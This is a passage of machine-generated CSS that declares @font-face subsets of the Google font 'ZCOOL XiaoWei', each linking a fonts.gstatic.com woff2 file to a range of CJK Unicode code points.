U+68c6, U+68c8, U+68ca, U+68cc, U+68d0-68d1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.65.woff2) format(\'woff2\');unicode-range: U+6631, U+6633-6634, U+6636, U+663a-663b, U+663d, U+6641, U+6644-6645, U+6649, U+664c, U+664f, U+6654, U+6659, U+665b, U+665d-665e, U+6660-6667, U+6669, U+666b-666c, U+6671, U+6673, U+6677-6679, U+667c, U+6680-6681, U+6684-6685, U+6688-6689, U+668b-668e, U+6690, U+6692, U+6695, U+6698, U+669a, U+669d, U+669f-66a0, U+66a2-66a3, U+66a6, U+66aa-66ab, U+66b1-66b2, U+66b5, U+66b8-66b9, U+66bb, U+66be, U+66c1, U+66c6-66c9, U+66cc, U+66d5-66d8, U+66da-66dc, U+66de-66e2, U+66e8-66ea, U+66ec, U+66f1, U+66f3, U+66f7, U+66fa, U+66fd, U+6702, U+6705, U+670a, U+670f-6710, U+6713, U+6715, U+6719, U+6722-6723, U+6725-6727, U+6729, U+672d-672e, U+6732-6733, U+6736, U+6739, U+673b, U+673f, U+6744, U+6748, U+674c-674d, U+6753, U+6755, U+6762, U+6767, U+6769-676c, U+676e, U+6772-6773, U+6775, U+6777, U+677a-677d, U+6782-6783, U+6787, U+678a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.66.woff2) format(\'woff2\');unicode-range: U+64f1-64f2, U+64f4, U+64f7-64f8, U+64fa, U+64fc, U+64fe-64ff, U+6503, U+6509, U+650f, U+6514, U+6518, U+651c-651e, U+6522-6525, U+652a-652c, U+652e, U+6530-6532, U+6534-6535, U+6537-6538, U+653a, U+653c-653d, U+6542, U+6549-654b, U+654d-654e, U+6553-6555, U+6557-6558, U+655d, U+6564, U+6569, U+656b, U+656d-656f, U+6571, U+6573, U+6575-6576, U+6578-657e, U+6581-6583, U+6585-6586, U+6589, U+658e-658f, U+6592-6593, U+6595-6596, U+659b, U+659d, U+659f-65a1, U+65a3, U+65ab-65ac, U+65b2, U+65b6-65b7, U+65ba-65bb, U+65be-65c0, U+65c2-65c4, U+65c6-65c8, U+65cc, U+65ce, U+65d0, U+65d2-65d3, U+65d6, U+65db, U+65dd, U+65e1, U+65e3, U+65ee-65f0, U+65f3-65f5, U+65f8, U+65fb-65fc, U+65fe-6600, U+6603, U+6607, U+6609, U+660b, U+6610-6611, U+6619-661a, U+661c-661e, U+6621, U+6624, U+6626, U+662a-662c, U+662e, U+6630;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.67.woff2) format(\'woff2\');unicode-range: U+63b8-63bc, U+63be, U+63c0, U+63c3-63c4, U+63c6, U+63c8, U+63cd-63ce, U+63d1, U+63d6, U+63da-63db, U+63de, U+63e0, U+63e3, U+63e9-63ea, U+63ee, U+63f2, U+63f5-63fa, U+63fc, U+63fe-6400, U+6406, U+640b-640d, U+6410, U+6414, U+6416-6417, U+641b, U+6420-6423, U+6425-6428, U+642a, U+6431-6432, U+6434-6437, U+643d-6442, U+6445, U+6448, U+6450-6452, U+645b-645f, U+6462, U+6465, U+6468, U+646d, U+646f-6471, U+6473, U+6477, U+6479-647d, U+6482-6485, U+6487-6488, U+648c, U+6490, U+6493, U+6496-649a, U+649d, U+64a0, U+64a5, U+64ab-64ac, U+64b1-64b7, U+64b9-64bb, U+64be-64c1, U+64c4, U+64c7, U+64c9-64cb, U+64d0, U+64d4, U+64d7-64d8, U+64da, U+64de, U+64e0-64e2, U+64e4, U+64e9, U+64ec, U+64f0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.68.woff2) format(\'woff2\');unicode-range: U+622c, U+622e-6230, U+6232, U+6238, U+623b, U+623d-623e, U+6243, U+6246, U+6248-6249, U+624c, U+6255, U+6259, U+625e, U+6260-6261, U+6265-6266, U+626a, U+6271, U+627a, U+627c-627d, U+6283, U+6286, U+6289, U+628e, U+6294, U+629c, U+629e-629f, U+62a1, U+62a8, U+62ba-62bb, U+62bf, U+62c2, U+62c4, U+62c8, U+62ca-62cb, U+62cf, U+62d1, U+62d7, U+62d9-62da, U+62dd, U+62e0-62e1, U+62e3-62e4, U+62e7, U+62eb, U+62ee, U+62f0, U+62f4-62f6, U+6308, U+630a-630e, U+6310, U+6312-6313, U+6317, U+6319, U+631b, U+631d-631f, U+6322, U+6326, U+6329, U+6331-6332, U+6334-6337, U+6339, U+633b-633c, U+633e-6340, U+6343, U+6347, U+634b-634e, U+6354, U+635c-635d, U+6368-6369, U+636d, U+636f-6372, U+6376, U+637a-637b, U+637d, U+6382-6383, U+6387, U+638a-638b, U+638d-638e, U+6391, U+6393-6397, U+6399, U+639b, U+639e-639f, U+63a1, U+63a3-63a4, U+63ac-63ae, U+63b1-63b5;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.69.woff2) format(\'woff2\');unicode-range: U+60ed-60ee, U+60f0-60f1, U+60f4, U+60f6, U+60fa, U+6100, U+6106, U+610d-610e, U+6112, U+6114-6115, U+6119, U+611c, U+6120, U+6122-6123, U+6126, U+6128-6130, U+6136-6137, U+613a, U+613d-613e, U+6144, U+6146-6147, U+614a-614b, U+6151, U+6153, U+6158, U+615a, U+615c-615d, U+615f, U+6161, U+6163-6165, U+616b-616c, U+616e, U+6171, U+6173-6177, U+617e, U+6182, U+6187, U+618a, U+618d-618e, U+6190-6191, U+6194, U+6199-619a, U+619c, U+619f, U+61a1, U+61a3-61a4, U+61a7-61a9, U+61ab-61ad, U+61b2-61b3, U+61b5-61b7, U+61ba-61bb, U+61bf, U+61c3-61c4, U+61c6-61c7, U+61c9-61cb, U+61d0-61d1, U+61d3-61d4, U+61d7, U+61da, U+61df-61e1, U+61e6, U+61ee, U+61f0, U+61f2, U+61f6-61f8, U+61fa, U+61fc-61fe, U+6200, U+6206-6207, U+6209, U+620b, U+620d-620e, U+6213-6215, U+6217, U+6219, U+621b-6223, U+6225-6226;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.70.woff2) format(\'woff2\');unicode-range: U+5fc4, U+5fc9, U+5fcb, U+5fce-5fd6, U+5fda-5fde, U+5fe1-5fe2, U+5fe4-5fe5, U+5fea, U+5fed-5fee, U+5ff1-5ff3, U+5ff6, U+5ff8, U+5ffb, U+5ffe-5fff, U+6002-6006, U+600a, U+600d, U+600f, U+6014, U+6019, U+601b, U+6020, U+6023, U+6026, U+6029, U+602b, U+602e-602f, U+6031, U+6033, U+6035, U+6039, U+603f, U+6041-6043, U+6046, U+604f, U+6053-6054, U+6058-605b, U+605d-605e, U+6060, U+6063, U+6065, U+6067, U+606a-606c, U+6075, U+6078-6079, U+607b, U+607d, U+607f, U+6083, U+6085-6087, U+608a, U+608c, U+608e-608f, U+6092-6093, U+6095-6097, U+609b-609d, U+60a2, U+60a7, U+60a9-60ab, U+60ad, U+60af-60b1, U+60b3-60b6, U+60b8, U+60bb, U+60bd-60be, U+60c0-60c3, U+60c6-60c9, U+60cb, U+60ce, U+60d3-60d4, U+60d7-60db, U+60dd, U+60e1-60e4, U+60e6, U+60ea, U+60ec;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.71.woff2) format(\'woff2\');unicode-range: U+5e98, U+5e9b, U+5e9d, U+5ea0-5ea5, U+5ea8, U+5eab, U+5eaf, U+5eb3, U+5eb5-5eb6, U+5eb9, U+5ebe, U+5ec1-5ec3, U+5ec6, U+5ec8, U+5ecb-5ecc, U+5ed1-5ed2, U+5ed4, U+5ed9-5edb, U+5edd, U+5edf-5ee0, U+5ee2-5ee3, U+5ee8, U+5eea, U+5eec, U+5eef-5ef0, U+5ef3-5ef4, U+5ef8, U+5efb-5efc, U+5efe-5eff, U+5f01, U+5f07, U+5f0b-5f0e, U+5f10-5f12, U+5f14, U+5f1a, U+5f22, U+5f28-5f29, U+5f2c-5f2d, U+5f35-5f36, U+5f38, U+5f3b-5f43, U+5f45-5f4a, U+5f4c-5f4e, U+5f50, U+5f54, U+5f56-5f59, U+5f5b-5f5f, U+5f61, U+5f63, U+5f65, U+5f67-5f68, U+5f6b, U+5f6e-5f6f, U+5f72-5f78, U+5f7a, U+5f7e-5f7f, U+5f82-5f83, U+5f87, U+5f89-5f8a, U+5f8d, U+5f91, U+5f93, U+5f95, U+5f98-5f99, U+5f9c, U+5f9e, U+5fa0, U+5fa6-5fa9, U+5fac-5fad, U+5faf, U+5fb3-5fb5, U+5fb9, U+5fbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.72.woff2) format(\'woff2\');unicode-range: U+5d26-5d27, U+5d2e-5d34, U+5d3c-5d3e, U+5d41-5d44, U+5d46-5d48, U+5d4a-5d4b, U+5d4e, U+5d50, U+5d52, U+5d55-5d58, U+5d5a-5d5d, U+5d68-5d69, U+5d6b-5d6c, U+5d6f, U+5d74, U+5d7f, U+5d82-5d89, U+5d8b-5d8c, U+5d8f, U+5d92-5d93, U+5d99, U+5d9d, U+5db2, U+5db6-5db7, U+5dba, U+5dbc-5dbd, U+5dc2-5dc3, U+5dc6-5dc7, U+5dc9, U+5dcc, U+5dd2, U+5dd4, U+5dd6-5dd8, U+5ddb-5ddc, U+5de3, U+5ded, U+5def, U+5df3, U+5df6, U+5dfa-5dfd, U+5dff-5e00, U+5e07, U+5e0f, U+5e11, U+5e13-5e14, U+5e19-5e1b, U+5e22, U+5e25, U+5e28, U+5e2a, U+5e2f-5e31, U+5e33-5e34, U+5e36, U+5e39-5e3c, U+5e3e, U+5e40, U+5e44, U+5e46-5e48, U+5e4c, U+5e4f, U+5e53-5e54, U+5e57, U+5e59, U+5e5b, U+5e5e-5e5f, U+5e61, U+5e63, U+5e6a-5e6b, U+5e75, U+5e77, U+5e79-5e7a, U+5e7e, U+5e80-5e81, U+5e83, U+5e85, U+5e87, U+5e8b, U+5e91-5e92, U+5e96;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.73.woff2) format(\'woff2\');unicode-range: U+5bec, U+5bee-5bf0, U+5bf2-5bf3, U+5bf5-5bf6, U+5bfe, U+5c02-5c03, U+5c05, U+5c07-5c09, U+5c0b-5c0c, U+5c0e, U+5c10, U+5c12-5c13, U+5c15, U+5c17, U+5c19, U+5c1b-5c1c, U+5c1e-5c1f, U+5c22, U+5c25, U+5c28, U+5c2a-5c2b, U+5c2f-5c30, U+5c37, U+5c3b, U+5c43-5c44, U+5c46-5c47, U+5c4d, U+5c50, U+5c59, U+5c5b-5c5c, U+5c62-5c64, U+5c66, U+5c6c, U+5c6e, U+5c74, U+5c78-5c7e, U+5c80, U+5c83-5c84, U+5c88, U+5c8b-5c8d, U+5c91, U+5c94-5c96, U+5c98-5c99, U+5c9c, U+5c9e, U+5ca1-5ca3, U+5cab-5cac, U+5cb1, U+5cb5, U+5cb7, U+5cba, U+5cbd-5cbf, U+5cc1, U+5cc3-5cc4, U+5cc7, U+5ccb, U+5cd2, U+5cd8-5cd9, U+5cdf-5ce0, U+5ce3-5ce6, U+5ce8-5cea, U+5ced, U+5cef, U+5cf3-5cf4, U+5cf6, U+5cf8, U+5cfd, U+5d00-5d04, U+5d06, U+5d08, U+5d0b-5d0d, U+5d0f-5d13, U+5d15, U+5d17-5d1a, U+5d1d-5d22, U+5d24-5d25;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.74.woff2) format(\'woff2\');unicode-range: U+5aa0, U+5aa3-5aa4, U+5aaa, U+5aae-5aaf, U+5ab1-5ab2, U+5ab4-5ab5, U+5ab7-5aba, U+5abd-5abf, U+5ac3-5ac4, U+5ac6-5ac8, U+5aca-5acb, U+5acd, U+5acf-5ad2, U+5ad4, U+5ad8-5ada, U+5adc, U+5adf-5ae2, U+5ae4, U+5ae6, U+5ae8, U+5aea-5aed, U+5af0-5af3, U+5af5, U+5af9-5afb, U+5afd, U+5b01, U+5b05, U+5b08, U+5b0b-5b0c, U+5b11, U+5b16-5b17, U+5b1b, U+5b21-5b22, U+5b24, U+5b27-5b2e, U+5b30, U+5b32, U+5b34, U+5b36-5b38, U+5b3e-5b40, U+5b43, U+5b45, U+5b4a-5b4b, U+5b51-5b53, U+5b56, U+5b5a-5b5b, U+5b62, U+5b65, U+5b67, U+5b6a-5b6e, U+5b70-5b71, U+5b73, U+5b7a-5b7b, U+5b7f-5b80, U+5b84, U+5b8d, U+5b91, U+5b93-5b95, U+5b9f, U+5ba5-5ba6, U+5bac, U+5bae, U+5bb8, U+5bc0, U+5bc3, U+5bcb, U+5bd0-5bd1, U+5bd4-5bd8, U+5bda-5bdc, U+5be2, U+5be4-5be5, U+5be7, U+5be9, U+5beb;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.75.woff2) format(\'woff2\');unicode-range: U+596a, U+596c-596e, U+5977, U+597b-597c, U+5981, U+598f, U+5997-5998, U+599a, U+599c-599d, U+59a0-59a1, U+59a3-59a4, U+59a7, U+59aa-59ad, U+59af, U+59b2-59b3, U+59b5-59b6, U+59b8, U+59ba, U+59bd-59be, U+59c0-59c1, U+59c3-59c4, U+59c7-59ca, U+59cc-59cd, U+59cf, U+59d2, U+59d5-59d6, U+59d8-59d9, U+59db, U+59dd-59e0, U+59e2-59e7, U+59e9-59eb, U+59ee, U+59f1, U+59f3, U+59f5, U+59f7-59f9, U+59fd, U+5a06, U+5a08-5a0a, U+5a0c-5a0d, U+5a11-5a13, U+5a15-5a16, U+5a1a-5a1b, U+5a21-5a23, U+5a2d-5a2f, U+5a32, U+5a38, U+5a3c, U+5a3e-5a45, U+5a47, U+5a4a, U+5a4c-5a4d, U+5a4f-5a51, U+5a53, U+5a55-5a57, U+5a5e, U+5a60, U+5a62, U+5a65-5a67, U+5a6a, U+5a6c-5a6d, U+5a72-5a73, U+5a75-5a76, U+5a79-5a7c, U+5a81-5a84, U+5a8c, U+5a8e, U+5a93, U+5a96-5a97, U+5a9c, U+5a9e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.76.woff2) format(\'woff2\');unicode-range: U+5820, U+5822-5823, U+5825-5826, U+582c, U+582f, U+5831, U+583a, U+583d, U+583f-5842, U+5844-5846, U+5848, U+584a, U+584d, U+5852, U+5857, U+5859-585a, U+585c-585d, U+5862, U+5868-5869, U+586c-586d, U+586f-5873, U+5875, U+5879, U+587d-587e, U+5880-5881, U+5888-588a, U+588d, U+5892, U+5896-5898, U+589a, U+589c-589d, U+58a0-58a1, U+58a3, U+58a6, U+58a9, U+58ab-58ae, U+58b0, U+58b3, U+58bb-58bf, U+58c2-58c3, U+58c5-58c8, U+58ca, U+58cc, U+58ce, U+58d1-58d3, U+58d5, U+58d8-58d9, U+58de-58df, U+58e2, U+58e9, U+58ec, U+58ef, U+58f1-58f2, U+58f5, U+58f7-58f8, U+58fa, U+58fd, U+5900, U+5902, U+5906, U+5908-590c, U+590e, U+5910, U+5914, U+5919, U+591b, U+591d-591e, U+5920, U+5922-5925, U+5928, U+592c-592d, U+592f, U+5932, U+5936, U+593c, U+593e, U+5940-5942, U+5944, U+594c-594d, U+5950, U+5953, U+5958, U+595a, U+5961, U+5966-5968;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.77.woff2) format(\'woff2\');unicode-range: U+56f9, U+56fc, U+56ff-5700, U+5703-5704, U+5709-570a, U+570c-570d, U+570f, U+5712-5713, U+5718-5719, U+571c, U+571e, U+5725, U+5727, U+5729-572a, U+572c, U+572e-572f, U+5734-5735, U+5739, U+573b, U+5741, U+5743, U+5745, U+5749, U+574c-574d, U+575c, U+5763, U+5768-5769, U+576b, U+576d-576e, U+5770, U+5773, U+5775, U+5777, U+577b-577c, U+5785-5786, U+5788, U+578c, U+578e-578f, U+5793-5795, U+5799-57a1, U+57a3-57a4, U+57a6-57aa, U+57ac-57ad, U+57af-57b2, U+57b4-57b6, U+57b8-57b9, U+57bd-57bf, U+57c2, U+57c4-57c8, U+57cc-57cd, U+57cf, U+57d2, U+57d5-57de, U+57e1-57e2, U+57e4-57e5, U+57e7, U+57eb, U+57ed, U+57ef, U+57f4-57f8, U+57fc-57fd, U+5800-5801, U+5803, U+5805, U+5807, U+5809, U+580b-580e, U+5811, U+5814, U+5819, U+581b-581f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.78.woff2) format(\'woff2\');unicode-range: U+55f5-55f7, U+55fb, U+55fe, U+5600-5601, U+5605-5606, U+5608, U+560c-560d, U+560f, U+5614, U+5616-5617, U+561a, U+561c, U+561e, U+5621-5625, U+5627, U+5629, U+562b-5630, U+5636, U+5638-563a, U+563c, U+5640-5642, U+5649, U+564c-5650, U+5653-5655, U+5657-565b, U+5660, U+5663-5664, U+5666, U+566b, U+566f-5671, U+5673-567c, U+567e, U+5684-5687, U+568c, U+568e-5693, U+5695, U+5697, U+569b-569c, U+569e-569f, U+56a1-56a2, U+56a4-56a9, U+56ac-56af, U+56b1, U+56b4, U+56b6-56b8, U+56bf, U+56c1-56c3, U+56c9, U+56cd, U+56d1, U+56d4, U+56d6-56d9, U+56dd, U+56df, U+56e1, U+56e3-56e6, U+56e8-56ec, U+56ee-56ef, U+56f1-56f3, U+56f5, U+56f7-56f8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.79.woff2) format(\'woff2\');unicode-range: U+550f, U+5511-5514, U+5516-5517, U+5519, U+551b, U+551d-551e, U+5520, U+5522-5523, U+5526-5527, U+552a-552c, U+5530, U+5532-5535, U+5537-5538, U+553b-5541, U+5543-5544, U+5547-5549, U+554b, U+554d, U+5550, U+5553, U+5555-5558, U+555b-555f, U+5567-5569, U+556b-5572, U+5574-5577, U+557b-557c, U+557e-557f, U+5581, U+5583, U+5585-5586, U+5588, U+558b-558c, U+558e-5591, U+5593, U+5599-559a, U+559f, U+55a5-55a6, U+55a8-55ac, U+55ae, U+55b0-55b3, U+55b6, U+55b9-55ba, U+55bc-55be, U+55c4, U+55c6-55c7, U+55c9, U+55cc-55d2, U+55d4-55db, U+55dd-55df, U+55e1, U+55e3-55e6, U+55ea-55ee, U+55f0-55f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.80.woff2) format(\'woff2\');unicode-range: U+53e7-53e9, U+53f1, U+53f4-53f5, U+53fa-5400, U+5402, U+5405-5407, U+540b, U+540f, U+5412, U+5414, U+5416, U+5418-541a, U+541d, U+5420-5423, U+5425, U+5429-542a, U+542d-542e, U+5431-5433, U+5436, U+543d, U+543f, U+5442-5443, U+5449, U+544b-544c, U+544e, U+5451-5454, U+5456, U+5459, U+545b-545c, U+5461, U+5463-5464, U+546a-5472, U+5474, U+5476-5478, U+547a, U+547e-5484, U+5486, U+548a, U+548d-548e, U+5490-5491, U+5494, U+5497-5499, U+549b, U+549d, U+54a1-54a7, U+54a9, U+54ab, U+54ad, U+54b4-54b5, U+54b9, U+54bb, U+54be-54bf, U+54c2-54c3, U+54c9-54cc, U+54cf-54d0, U+54d3, U+54d5-54d6, U+54d9-54da, U+54dc-54de, U+54e2, U+54e7, U+54f3-54f4, U+54f8-54f9, U+54fd-54ff, U+5501, U+5504-5506, U+550c-550e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.81.woff2) format(\'woff2\');unicode-range: U+5289, U+528b, U+528d, U+528f, U+5291-5293, U+529a, U+52a2, U+52a6-52a7, U+52ac-52ad, U+52af, U+52b4-52b5, U+52b9, U+52bb-52bc, U+52be, U+52c1, U+52c5, U+52ca, U+52cd, U+52d0, U+52d6-52d7, U+52d9, U+52db, U+52dd-52de, U+52e0, U+52e2-52e3, U+52e5, U+52e7-52f0, U+52f2-52f3, U+52f5-52f9, U+52fb-52fc, U+5302, U+5304, U+530b, U+530d, U+530f-5310, U+5315, U+531a, U+531c-531d, U+5321, U+5323, U+5326, U+532e-5331, U+5338, U+533c-533e, U+5344-5345, U+534b-534d, U+5350, U+5354, U+5358, U+535d-535f, U+5363, U+5368-5369, U+536c, U+536e-536f, U+5372, U+5379-537b, U+537d, U+538d-538e, U+5390, U+5393-5394, U+5396, U+539b-539d, U+53a0-53a1, U+53a3-53a5, U+53a9, U+53ad-53ae, U+53b0, U+53b2-53b3, U+53b5-53b8, U+53bc, U+53be, U+53c1, U+53c3-53c7, U+53ce-53cf, U+53d2-53d3, U+53d5, U+53da, U+53de-53df, U+53e1-53e2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.82.woff2) format(\'woff2\');unicode-range: U+5104, U+5106-5107, U+5109-510b, U+510d, U+510f-5110, U+5113, U+5115, U+5117-5118, U+511a-511c, U+511e-511f, U+5121, U+5128, U+512b-512d, U+5131-5135, U+5137-5139, U+513c, U+5140, U+5142, U+5147, U+514c, U+514e-5150, U+5155-5158, U+5162, U+5169, U+5172, U+517f, U+5181-5184, U+5186-5187, U+518b, U+518f, U+5191, U+5195-5197, U+519a, U+51a2-51a3, U+51a6-51ab, U+51ad-51ae, U+51b1, U+51b4, U+51bc-51bd, U+51bf, U+51c3, U+51c7-51c8, U+51ca-51cb, U+51cd-51ce, U+51d4, U+51d6, U+51db-51dc, U+51e6, U+51e8-51eb, U+51f1, U+51f5, U+51fc, U+51ff, U+5202, U+5205, U+5208, U+520b, U+520d-520e, U+5215-5216, U+5228, U+522a, U+522c-522d, U+5233, U+523c-523d, U+523f-5240, U+5245, U+5247, U+5249, U+524b-524c, U+524e, U+5250, U+525b-525f, U+5261, U+5263-5264, U+5270, U+5273, U+5275, U+5277, U+527d, U+527f, U+5281-5285, U+5287;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.83.woff2) format(\'woff2\');unicode-range: U+4fd1, U+4fd3, U+4fda-4fdc, U+4fdf-4fe0, U+4fe2-4fe4, U+4fe6, U+4fe8, U+4feb-4fed, U+4ff3, U+4ff5-4ff6, U+4ff8, U+4ffe, U+5001, U+5005-5006, U+5009, U+500c, U+500f, U+5013-5018, U+501b-501e, U+5022-5025, U+5027-5028, U+502b-502e, U+5030, U+5033-5034, U+5036-5039, U+503b, U+5041-5043, U+5045-5046, U+5048-504a, U+504c-504e, U+5051, U+5053, U+5055-5057, U+505b, U+505e, U+5060, U+5062-5063, U+5067, U+506a, U+506c, U+5070-5072, U+5074-5075, U+5078, U+507b, U+507d-507e, U+5080, U+5088-5089, U+5091-5092, U+5095, U+5097-509e, U+50a2-50a3, U+50a5-50a7, U+50a9, U+50ad, U+50b3, U+50b5, U+50b7, U+50ba, U+50be, U+50c4-50c5, U+50c7, U+50ca, U+50cd, U+50d1, U+50d5-50d6, U+50da, U+50de, U+50e5-50e6, U+50ec-50ee, U+50f0-50f1, U+50f3, U+50f9-50fb, U+50fe-5102;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.84.woff2) format(\'woff2\');unicode-range: U+4ea3, U+4ea5, U+4eb0-4eb1, U+4eb3-4eb6, U+4eb8-4eb9, U+4ebb-4ebe, U+4ec2-4ec4, U+4ec8-4ec9, U+4ecc, U+4ecf-4ed0, U+4ed2, U+4eda-4edb, U+4edd-4ee1, U+4ee6-4ee9, U+4eeb, U+4eee-4eef, U+4ef3-4ef5, U+4ef8-4efa, U+4efc, U+4f00, U+4f03-4f05, U+4f08-4f09, U+4f0b, U+4f0e, U+4f12-4f13, U+4f15, U+4f1b, U+4f1d, U+4f21-4f22, U+4f25, U+4f27-4f29, U+4f2b-4f2e, U+4f31-4f33, U+4f36-4f37, U+4f39, U+4f3e, U+4f40-4f41, U+4f43, U+4f47-4f49, U+4f54, U+4f57-4f58, U+4f5d-4f5e, U+4f61-4f62, U+4f64-4f65, U+4f67, U+4f6a, U+4f6e-4f6f, U+4f72, U+4f74-4f7e, U+4f80-4f82, U+4f84, U+4f89-4f8a, U+4f8e-4f98, U+4f9e, U+4fa1, U+4fa5, U+4fa9-4faa, U+4fac, U+4fb3, U+4fb6-4fb8, U+4fbd, U+4fc2, U+4fc5-4fc6, U+4fcd-4fce, U+4fd0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.85.woff2) format(\'woff2\');unicode-range: U+3129, U+3131, U+3134, U+3137, U+3139, U+3141-3142, U+3145, U+3147-3148, U+314b, U+314d-314e, U+315c, U+3160-3161, U+3163-3164, U+3186, U+318d, U+3192, U+3196-3198, U+319e-319f, U+3220-3229, U+3231, U+3268, U+3297, U+3299, U+32a3, U+338e-338f, U+3395, U+339c-339e, U+33c4, U+33d1-33d2, U+33d5, U+3434, U+34dc, U+34ee, U+353e, U+355d, U+3566, U+3575, U+3592, U+35a0-35a1, U+35ad, U+35ce, U+36a2, U+36ab, U+38a8, U+3dab, U+3de7, U+3deb, U+3e1a, U+3f1b, U+3f6d, U+4495, U+4723, U+48fa, U+4ca3, U+4db6-4dbf, U+4e02, U+4e04-4e06, U+4e0c, U+4e0f, U+4e15, U+4e17, U+4e1f-4e21, U+4e26, U+4e29, U+4e2c, U+4e2f, U+4e31, U+4e35, U+4e37, U+4e3c, U+4e3f-4e42, U+4e44, U+4e46-4e47, U+4e57, U+4e5a-4e5c, U+4e64-4e65, U+4e67, U+4e69, U+4e6d, 